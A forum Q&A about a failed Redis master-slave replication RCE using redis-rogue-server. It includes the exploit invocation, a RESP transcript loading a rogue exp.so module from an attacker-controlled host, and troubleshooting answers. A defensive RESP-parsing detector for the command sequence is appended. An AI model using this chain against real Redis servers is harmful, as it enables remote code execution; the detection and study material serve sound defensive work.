0

I am new to this forum and looking for some help to understand this exploit. I am trying to check command execution on a vulnerable Redis server.

Following this document, I am able to exploit a Redis server, but I am not able to type in any commands, i.e. it is not giving me output. I see OK printed on a command prompt of the server. Is there anything I am missing here, or do the commands need to be executed differently on this shell:

https://medium.com/@knownsec404team/rce-exploits-of-redis-based-on-master-slave-replication-ef7a664ce1d0

root/redis-rogue-server# python3 redis-rogue-server.py --rhost 10.10.10.11 --rport 6379 --lhost 10.10.10.10 --lport 21001
TARGET 10.10.10.11:6379
SERVER 10.10.10.10:21001
[<-] b'*3\r\n$7\r\nSLAVEOF\r\n$13\r\n10.10.10.10\r\n$5\r\n21001\r\n'
[->] b'+OK\r\n'
[<-] b'*4\r\n$6\r\nCONFIG\r\n$3\r\nSET\r\n$10\r\ndbfilename\r\n$6\r\nexp.so\r\n'
[->] b'+OK\r\n'
[->] b'PING\r\n'
[<-] b'+PONG\r\n'
[->] b'REPLCONF listening-port 6379\r\n'
[<-] b'+OK\r\n'
[->] b'REPLCONF capa eof\r\n'
[<-] b'+OK\r\n'
[->] b'PSYNC ? -1\r\n'
[<-] b'+FULLRESYNC ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ 1\r\n$48560\r\n\x7fELF\x02\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00'......b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd9\xb6\x00\x00\x00\x00\x00\x00\xd3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\r\n'
[<-] b'*3\r\n$6\r\nMODULE\r\n$4\r\nLOAD\r\n$8\r\n./exp.so\r\n'
[->] b"-ERR unknown command 'MODULE'\r\n"
[<-] b'*3\r\n$7\r\nSLAVEOF\r\n$2\r\nNO\r\n$3\r\nONE\r\n'
[->] b'+OK\r\n'
[<<] whoami
[<-] b'*2\r\n$11\r\nsystem.exec\r\n$6\r\nwhoami\r\n'
[<<] ifconfig
[<-] b'*2\r\n$11\r\nsystem.exec\r\n$8\r\nifconfig\r\n'
[->] b"-ERR unknown command 'system.exec'\r\n"
Gerald Schneider
Sophia

2 Answers

0

Looks like the module failed to load. Check your .so file. It seems the same as what I have met: the arch of my build machine is x86 and the target server running redis is x86_64 Linux, and it does not have the x86 library installed by default.

0

The redis instance doesn't have the MODULE command, which is odd. If this is a CTF, it might be intentional that the box creator removed it.

[<-] b'*3\r\n$6\r\nMODULE\r\n$4\r\nLOAD\r\n$8\r\n./exp.so\r\n'
[->] b"-ERR unknown command 'MODULE'\r\n"

That's why the actual module was not loaded into the redis server.

[->] b"-ERR unknown command 'system.exec'\r\n"
mit13
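
A defender-side reading of the transcript above, as an added example that is not part of the original post or of redis-rogue-server: it decodes the RESP command frames sent to the server and flags the SLAVEOF, CONFIG SET dbfilename and MODULE LOAD steps. The helper names `parse_resp`, `flag` and `full_sequence` and the three rule labels are assumptions made for illustration.

```python
# Added example. Frames are constructed from the "[<-]" lines of the transcript;
# the SLAVEOF host length is written as $11 to match the 11-byte address shown
# (the $13 in the post does not match that address and would fail the parser).
SAMPLE = (
    b'*3\r\n$7\r\nSLAVEOF\r\n$11\r\n10.10.10.10\r\n$5\r\n21001\r\n'
    b'*4\r\n$6\r\nCONFIG\r\n$3\r\nSET\r\n$10\r\ndbfilename\r\n$6\r\nexp.so\r\n'
    b'*3\r\n$6\r\nMODULE\r\n$4\r\nLOAD\r\n$8\r\n./exp.so\r\n'
    b'*3\r\n$7\r\nSLAVEOF\r\n$2\r\nNO\r\n$3\r\nONE\r\n'
    b'*2\r\n$11\r\nsystem.exec\r\n$6\r\nwhoami\r\n'
)

def parse_resp(data):
    """Decode a byte stream of RESP arrays of bulk strings into argument lists."""
    cmds, pos = [], 0
    def read_line(prefix):
        nonlocal pos
        end = data.index(b'\r\n', pos)
        if data[pos:pos + 1] != prefix:
            raise ValueError(f'expected {prefix!r} at offset {pos}')
        value, pos = int(data[pos + 1:end]), end + 2
        return value
    while pos < len(data):
        args = []
        for _ in range(read_line(b'*')):
            size = read_line(b'$')
            if data[pos + size:pos + size + 2] != b'\r\n':
                raise ValueError(f'bulk length {size} does not match payload at offset {pos}')
            args.append(data[pos:pos + size].decode('latin-1'))
            pos += size + 2
        if args:  # skip empty arrays so flag() can index args[0]
            cmds.append(args)
    return cmds

def flag(cmds):
    """Return (index, kind, detail) for commands matching one step of the sequence."""
    hits = []
    for i, args in enumerate(cmds):
        name, rest = args[0].upper(), [a.lower() for a in args[1:]]
        if name in ('SLAVEOF', 'REPLICAOF') and rest != ['no', 'one']:
            hits.append((i, 'replica-of', ':'.join(args[1:])))
        elif name == 'CONFIG' and rest[:2] == ['set', 'dbfilename'] and rest[-1].endswith('.so'):
            hits.append((i, 'dbfilename-so', args[-1]))
        elif name == 'MODULE' and rest[:1] == ['load']:
            hits.append((i, 'module-load', args[-1]))
    return hits

def full_sequence(hits):
    """True when all three steps occur in the order shown in the transcript."""
    kinds = iter(kind for _, kind, _ in hits)
    return all(step in kinds for step in ('replica-of', 'dbfilename-so', 'module-load'))
```

Any single hit can be legitimate administration; the ordered combination reported by `full_sequence` is the part worth alerting on.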